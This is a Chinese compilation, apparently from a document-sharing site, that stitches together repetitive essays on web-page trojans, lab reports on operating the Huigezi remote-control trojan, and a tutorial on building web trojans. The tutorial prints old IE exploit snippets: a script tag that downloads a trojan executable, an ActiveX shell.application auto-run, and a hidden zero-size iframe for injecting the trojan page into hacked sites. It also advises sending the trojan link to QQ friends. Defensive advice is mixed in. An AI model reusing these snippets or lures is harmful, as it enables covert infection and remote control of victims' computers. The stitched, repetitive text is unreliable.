灰鸽子网页木马从原理、制作到防范
网页木马机理与防御方法
网页木马机理与防御方法网页木马是一种常见的网络安全威胁,它可以通过植入恶意代码来窃取用户的隐私信息、篡改网页内容,甚至控制用户的电脑。
在互联网日益普及的今天,网页木马成为了网络安全的一大隐患,防范网页木马攻击成为了网络安全的重要工作之一。
本文将详细介绍网页木马的机理与防御方法,帮助读者更好地了解和防范此类安全威胁。
一、网页木马的机理1. 植入恶意代码网页木马通常是通过植入恶意代码来实现攻击的。
攻击者会利用各种手段,如漏洞利用、社会工程学等方式,将恶意代码植入到网页中,并隐藏在网页的代码中。
一旦用户访问了被植入了恶意代码的网页,就会触发木马的攻击机制。
2. 收集用户隐私信息网页木马可以通过恶意代码收集用户的隐私信息,包括账号密码、银行卡信息、个人身份证信息等。
攻击者可以利用这些信息进行盗窃、诈骗等违法活动。
3. 篡改网页内容除了窃取用户信息之外,网页木马还可以篡改网页内容,如插入广告、篡改链接等。
这不仅影响用户体验,还可能导致用户误操作,进而陷入更多的安全风险。
4. 控制用户电脑部分网页木马甚至可以控制用户的电脑,比如远程操控用户电脑进行挖矿、发起DDoS 攻击等恶意行为。
这对用户的个人信息安全、电脑安全都构成了严重威胁。
二、网页木马的防御方法1. 加强网页安全意识作为用户,加强对网络安全的意识是预防网页木马攻击的第一步。
在浏览网页时,尽量避免访问不明来源的网页,不轻信陌生网站的链接,避免点击不明链接,不轻易安装来历不明的插件和软件。
2. 使用安全浏览器安全浏览器通常内置了网页木马检测和拦截功能,可以及时识别和阻止恶意网页的访问。
用户可以选择安装一些知名的安全浏览器,如360安全浏览器、腾讯浏览器等,以增强对网页木马的防护能力。
3. 安装杀毒软件和防火墙安装有效的杀毒软件和防火墙是防范网页木马攻击的重要手段。
杀毒软件和防火墙可以帮助用户实时监控和拦截恶意代码的攻击,保护用户的电脑和个人信息安全。
4. 定期更新系统和软件定期更新操作系统和软件补丁可以修复系统漏洞,从而减少网页木马攻击的风险。
网页木马机理与防御方法
网页木马机理与防御方法网页木马是一种隐藏于网页中的恶意程序,通过利用网页脚本漏洞或浏览器漏洞,对用户进行攻击。
一旦用户访问被感染的网页,木马就会悄悄地在用户的计算机上执行恶意操作,比如窃取用户的个人信息、篡改网页内容或者植入其他恶意软件。
本文将介绍网页木马的机理和防御方法。
网页木马的机理主要包括以下几个步骤:1. 找到目标网页:攻击者会寻找目标网站中的漏洞,通常是通过扫描工具来自动化遍历网站的各个页面。
2. 注入恶意代码:一旦找到漏洞,攻击者会将恶意代码注入到目标网页中,通常是通过修改网页的脚本文件或者数据库进行操作。
3. 传送木马:攻击者在注入的恶意代码中加入木马程序,在用户访问被感染的网页时,木马会被下载到用户的计算机上并执行。
4. 控制用户计算机:一旦木马成功执行,攻击者就可以通过远程控制来操控用户的计算机,进行各种恶意操作。
为了防止网页木马的入侵,可以采取以下几种防御方法:1. 及时更新系统和软件:许多网页木马利用已知的计算机漏洞进行攻击,及时更新操作系统和浏览器等软件是最基本的防御措施之一。
2. 使用防病毒软件:安装有效的防病毒软件可以帮助防止木马的入侵。
及时更新病毒库是保持防病毒软件有效性的关键。
3. 网络安全意识教育:加强用户的网络安全意识,警惕点击可疑链接,不随意下载来路不明的文件,可以避免许多网页木马的感染。
4. 配置安全策略:限制网页脚本的执行,禁用危险的ActiveX控件,限制网页对本地文件的访问等措施可以大幅降低木马的攻击风险。
5. 过滤恶意代码:使用安全工具对输入的网页代码进行过滤,防止恶意代码的注入和执行。
6. 网站漏洞修复:对网站进行定期的漏洞扫描和修复,可以防止攻击者利用网站漏洞进行木马注入。
网页木马的威胁日益增长,防御网页木马是保护用户计算机和个人信息安全的重要任务。
通过及时更新系统软件、使用防病毒软件、加强网络安全意识等措施,可以有效降低木马攻击的风险。
网站管理员也应该加强网站的安全措施,定期修复漏洞,以保护用户免受网页木马的侵害。
灰鸽子木马利用与防护
任务名称:灰鸽子木马利用与防护任务目的与要求:了解木马病毒对终端主机的安全威胁,以及木马病毒如何对主机进行攻击。
本次任务要求学生学习灰鸽子木马远程控制软件的使用,通过实验可以了解木马和计算机病毒的区别,熟悉使用木马进行网络攻击的原理和方法。
实验任务涉及到的相关知识:任务环境拓扑:具体步骤:1.登录windows2003,打开灰鸽子软件。
winxpwindows20032.灰鸽子木马共有两个应用程序,其中一个是服务器程序,该程序由客户端配置产生,属于木马受控端程序,种木马时,需将该程序放入到受控端的计算机中,然后双击该程序即可;H_client.exe是木马的客户端程序,属于木马的主控端程序。
首先点击H_client.exe打开客户端,选择“文件-配置服务器”配置服务器端。
点击“生成服务器”即生成了一个服务器端,点击“确定”3.登录到XP系统。
点击“开始”-“运行”,输入“\\192.168.0.46(win2003的IP地址,已在win2003系统下通过ipconfig命令查看为准),可以通过共享查看win2003共享的文件,如图所示,将setup.exe拷贝到XP系统的桌面,然后双击运行。
4.返回win2003,点击“文件”-“增加主机”,输入XP的IP地址192.168.0.43(以在XP下通过ipconfig命令查看到得IP为准),点击确定。
5.双击文件目录浏览下的“我的电脑”,可以查看到主机为192.168.0.43的标识。
然后双击192.168.0.43,可以查看到XP系统的目录及文件。
此时点击C:\Documents and Settings\Administrator\桌面,可以查看到XP左面上放置的文件setup.exe服务器端。
6.右击setup.exse,选择“文件下载至”,然后将该文件保存到win2003的桌面。
此时通过灰鸽子对XP系统的文件进行操作,以及查看XP信息,远程发送命令、编辑注册表、远程监控、命令广播等功能。
浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析
浏览网页中木马的原理和防范--灰鸽子网页木马的制作和解析1.网页木马从原理如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="hxxp:///1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
网页木马机理与防御方法
网页木马机理与防御方法网页木马是一种通过网页页面进行传播和执行恶意代码的攻击方式。
当用户访问被感染的网页时,木马代码会在用户的电脑上运行,从而导致安全风险和信息泄露。
下面将介绍网页木马的机理以及防御方法。
一、网页木马的机理网页木马通常利用以下几种方式进行传播和攻击:1. 漏洞利用:利用网页中存在的安全漏洞,通过注入恶意代码或利用已知漏洞进行攻击。
常见的漏洞包括Cross-site Scripting (XSS)和Cross-site Request Forgery (CSRF)等。
2. 伪装下载:通过伪装成常见软件、游戏或网页插件等可信来源,诱使用户下载和安装木马程序。
这种方式常用于传播恶意软件和病毒。
3. 社交工程:通过发送钓鱼邮件、社交媒体欺骗等方式,诱使用户点击恶意链接或下载恶意文件。
二、网页木马的防御方法为了确保网页的安全性和用户的隐私,以下是一些常用的防御方法:1. 及时更新:网页开发人员应及时更新系统和软件补丁,修复已知的安全漏洞,以阻止木马利用这些漏洞进行攻击。
2. 输入验证:对于前端输入字段,进行严格的数据验证和过滤,以防止恶意代码的注入。
后端也要对接收到的数据进行过滤和处理,确保安全性。
3. 安全策略:设置合适的访问控制策略,只允许必要的访问权限。
限制外部请求的访问和操作范围,避免恶意代码的传播和执行。
4. 密码安全:用户的密码应采用安全性较高的加密算法进行存储,并设置合理的密码复杂度要求。
建议用户定期更换密码,避免被破解。
5. 安全证书:为网页配置SSL证书,使用HTTPS协议加密网页通信。
这样可以确保用户的信息在传输过程中不被窃取或篡改。
6. 安全意识培训:定期对公司员工进行网络安全意识培训,教育他们识别和防范网页木马的攻击。
提醒他们不要点击可疑链接或下载未知来源的文件。
7. 安全扫描:定期使用安全扫描工具对网页进行全面扫描,及时发现漏洞和木马,并采取相应的修复措施。
总结:网页木马是一种通过网页页面传播恶意代码的攻击方式。
网页木马机理与防御方法
网页木马机理与防御方法
网页木马是指隐藏在网页内的恶意程序,可以盗取用户的信息、远程控制计算机等。
网页木马主要通过以下几种方式进行攻击:
1. 嵌入恶意代码:攻击者在网页中嵌入恶意代码,当用户访问该网页时,恶意代码
会自动执行,从而实现攻击目的。
2. 重定向攻击:攻击者利用漏洞将用户重定向到含有恶意代码的网页,从而使恶意
代码得以执行。
3. XSS攻击:攻击者通过在网页中注入脚本代码,实现对用户的攻击。
为了保护用户的信息安全,以下是一些防御网页木马的方法:
1. 安装杀毒软件:最好安装具有实时监控功能的杀毒软件,可根据用户使用习惯自
动检测潜在威胁。
2. 及时升级系统和软件:及时升级用户的操作系统和软件,修补系统漏洞,避免被
攻击者利用。
3. 禁用浏览器插件:禁用不必要的浏览器插件,减少攻击者入侵的机会。
4. 谨慎浏览网页:谨慎点击不明链接和来信,以免被引诱至含有恶意程序的网页上。
5. 开启网络防火墙:开启网络防火墙可阻止攻击者利用网络漏洞进行攻击,提高网
页安全性。
网页木马是一种隐蔽的攻击方式,攻击者刚开始的行动难以被察觉,因此防范非常重要。
在使用互联网时,用户应该注意网页的来源和质量,保护自己的个人隐私和信息安全。
实验六、第三代木马 灰鸽子
灰鸽子木马实验报告一、实验目的及要求[目的]1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。
[内容及要求]1、练习软件的哪些功能2、通过实验了解灰鸽子是一款的远程控制软件。
3、熟悉使用木马进行网络攻击的原理和方法。
[试验环境]虚拟机下安装组建一个局域网 2台安装了win2000/win2003/XP系统的电脑 灰鸽子木马软件。
二、实验方法与步骤:1 打开虚拟机 开启windows server 2003 A与windows server 2003 B 将其网络设备器设置在同一局域网内 例vmnet22 打开灰鸽子 并查看本机IP地址3 点击配置服务程序 新建一个木马病毒密码可设置也可不设置3 将生产的木马病毒设法放入目标主机 并使其运行原始木马样子4 目标主机运行后 本机灰鸽子显示其登录我们可对目标及进行 下载上传等基本运行5 还可以进行更深层次的控制,例如屏幕捕捉与控制,广播,关机开机,注册表的编辑等 (看红框标识处)(6)灰鸽子木马的伪装,木马捆绑器:现今社会杀毒软件的辨识度已然很高,而人们的警惕度也越来越高,木马若想成功的被目标主机运行,必然要做一定的伪装生成一个可执行文件,虽然风险乜很高,但不失为一种方法!6 木马分离器:三、使用心得1 熟悉灰鸽子之后,我们了解了木马的强大以及危害之处,如何防范木马,是当今信息社会的一种不可不重视的问题。
计算机病毒泛滥尤以木马病毒为甚。
木马病毒是一种远程控制程序 “黑客”利用计算机系统和软件的漏洞将一段程序植入远端电脑后,可以借助其配套的控制程序来远程控制中毒电脑 肆无忌惮地查看、下载他人电脑中的内容。
掌握了它的原因,对于防护电脑避免木马入侵我们应该有一定对策2 如何防范木马病毒一、检测网络连接二、禁用不明服务三、轻松检查账户四、及时修补漏洞和关闭可疑的端口五、安装杀毒软件并及时更新六、运行实时监控程序。
灰鸽子木马实验报告
病毒防治实验报告学生姓名学号专业班级指导教师学院信息科学与工程学院完成时间2014年4月一.实验目的及要求目的:了解灰鸽子是一个集多种控制方法于一体的木马病毒。
二.内容及要求1.练习软件的哪些功能,自己总结2.通过实验了解灰鸽子是一款远程控制软件。
3.熟悉使用木马进行网络攻击的原理和方法。
实验环境:虚拟机下安装组建一个局域网,2台安装win2000/win2003/XP系统的电脑,灰鸽子木马软件。
二.实验方法与步骤:1)打开虚拟机通过实验室的实验平台打开网站192.168.1.1:8088/limp开始试验-选择灰鸽子木马实验打开2个虚拟机,1号机作为服务器,2号机作为客户端。
在拓扑结构上的连接2太虚拟机。
通过PING (对方的IP)验证是否连接成功。
2)打开客户端屏幕上的灰鸽子木马文件,运行EXE文件。
3)木马制作首先配置服务程序123在自动上线设置的IP通知中填写本机的IP地址可以通过-运行-cmd-ipconfig查找本机的IP地址4高级设置这是显示在进程中的描述设置然后点击生成服务器。
5木马种植--将生成的服务器转移到服务器(肉鸡)上通过漏洞或溢出得到远程主机权限,上传并运行灰鸽子木马本地对植入灰鸽子的主机进行连接,看是否能连接灰鸽子。
(若无法获得远程主机权限可将生成的服务器程序拷贝到远程主机并运行)如果成功,则会出现通过-cmd-netstat -na查看所有的连接,确定连接成功。
可以通过捕捉屏幕和视频语言对目标服务器进行监控,或者通过Telnet对其进行控制。
6查看进程启动ICESWORD检查开放进程,进程中多出了IEXPLORE.exe 进程,这个进程即是启动灰鸽子木马的进程,起到隐藏灰鸽子木马自身的程序的目的。
7感想计算机病毒很可怕,他会在不知不觉中使我们被监控,财产处于危险中。
所以要做好防治病毒的工作。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
灰鸽子”网页木马从原理、制作到防范如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe 改为bat或com,这样他们就可以把这些程序上传到服务器上了。
把这段代码插入到网页源代码的</BODY>…</BODY>之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录<Temporary Internet Files>,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
图1 网页木马示例小提示:灰鸽子木马为什么一定要用灰鸽子木马呢?因为灰鸽子是反弹型木马,该木马能绕过天网等大多数防火墙的拦截,中马后,服务端即被控端能主动连接控制端(客户端),也就是说,一旦被控端连接到Internet,在控制端那里,被控端就会“自动上线”(如图2)。
图2 灰鸽子控制短示例(汗!又一大毒枭:))⒉自动运行程序<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application");space("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT>把这段代码插入到网页源代码的</BODY>…</BODY>之间,然后用IE 打开该网页,你会发现,这段代码可以在没有打相关补丁的IE6中自动打开记事本。
这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,可以用它自动运行本地电脑上的任意程序。
通过以上的代码我们可以看出,利用IE的漏洞,也就是说在网页中插入适当的代码,IE完全可以自动下载和运行程序,不过,IE一旦打了相关补丁,这些代码就会失去作用。
另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃避追杀,黑客可能会使用一些工具对网页的源代码进行加密处理(如图3)。
图3 加密后的网页代码二、网页木马的基本用法理解了网页木马攻击的原理,我们可以制作自己的网页木马,但这需要你根据IE漏洞写出利用代码。
实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。
在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到网络上),利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。
在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生成网页木马并让他人中木马。
第一步:启动该网页木马生成器,如图4所示,在文本框中输入木马的网络地址,最后单击“生成”。
图4 网页木马生成器第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。
上传该文件到自己的Web服务器或免费主面空间。
现在好了,把上述网页在服务器上的地址(网址)通过QQ发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。
现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Internet,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。
实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页木马。
在下面我们只介绍黑客如何在知名网站上挂网页木马。
下面来看这一段代码:iframe src="/hk.htm" width="0"height="0" frameborder="0"></iframe>小提示:“src”的属性“/hk.htm”是上传到服务器上的网页木马的网址。
把这段代码插入到某门户网站首页源代码的</BODY>…</BODY>之间,从表面上看,插入后该门户的首页并没有什么变化,但是,所有访问了该门户网站首页的人都会中木马,为什么会这样呢?这是因为这段代码中<iframe>标签把网页木马网页隐藏性地“包含”在了插入代码的网页当中。
<iframe>也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果(如图5),被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。
在上代代码中,因为把宽(width)、高(height)、边框(frameborder)都设置为了“0”,所以,上述代码插入到门户网站的首页后,网站的首页不会发生变化,但是,由于嵌入的网页实际上已经打开了,所以网页上的下载木马和运行木马的脚本还是会随着门户首页的打开而执行的。
图5 iframe标签示例也许有人会问,如何把上述代码插入到门户网站首页的源代码中?这个问题问得好,本人才疏学浅,确实无法进入他们的服务器修改网页,但是黑客如果发现了这些服务器上的漏洞且获得了webshell权限,那么修改他们的网页就跟在本地制作一个网页一样容易。
有人还问,拿到服务器的webshell权限容易吗?如果你对网络安全比较关注,你会发现,经常有这个网站被黑了,那个网站的主页被修改了的新闻爆出。
有人还问,门户的服务器几乎无漏洞可找,个人服务器的漏洞较多,你能进入吗?本人不是黑客,中华人民共和国的法律规定,入侵和篡改他人服务器上的信息是违法行为,希望大家共同维护网络安全。
以前,在网上打开一些有名的网站时杀毒软件也会报警,现在你明白其中的道理了吧。
有些人在这些网站发帖子骂娘,看了本文,希望在骂娘时你也能为那些垫背的站长想想。
三:网页木马的防范策略网页木马的防范只靠杀毒软件和防火墙是远远不够的,因为一旦黑客使用了反弹端口的个人版木马(个人反汇编的一些杀毒软件无法识别的木马),那么杀毒软件和防火墙就无可奈何,所以,网页木马的防范要从它的原理入手,从根子上进行防范。
㈠即时安装安全补丁网页木马都是利用IE漏洞进行传播的,我们拿冰狐浪子的网页木马(用“冰狐浪子网页木马生成器”制作的网页木马)来说吧,该网页能绕过IE的安全设置,当用户连接到该网页时,它能在普通用户不知情的情况下在后台下载一个木马并运行(安装)该木马。
所以,经常到微软网站去下载并安装最新的安全补丁是防范网页木马比较有效的办法。
㈡改名或卸载(反注册)最不安全的ActiveXObject(IE插件)在系统中有些ActiveXObject会运行EXE程序,比如本文中“自动运行程序”代码中的Shell.application控件,这些控件一旦在网页中获得了执行权限,那么它就会变为木马运行的“温床”,所以把这些控件改名或卸载能彻底防范利用这些控件的网页木马。
但是ActiveXObject是为了应用而出现的,而不是为了攻击而出现的,所有的控件都有它的用处,所以在改名或卸载一个控件之前,你必须确认这个控件是你不需要的,或者即使卸载了也不关大体的。
⒈卸载(反注册)ActiveXObject第一步:在“开始”菜单上单击“运行”,输入“CMD”命令打开命令提示符窗口。
第二步:在命令提示符下输入“regsvr32.exe shell32.dll /u/s”,然后回车就能将Shell.application控件卸载。
如果日后我们希望继续使用这个控件的话,可以在命令提示符窗口中输入“regsvr32.exe shell32.dll /i/s”命令将它们重新安装(注册)。
在上述命令中:“regsvr32.exe”是注册或反注册OLE对象或控件的命令,[/u]是反注册参数,[/s]是寂静模式参数,[/I]为安装参数。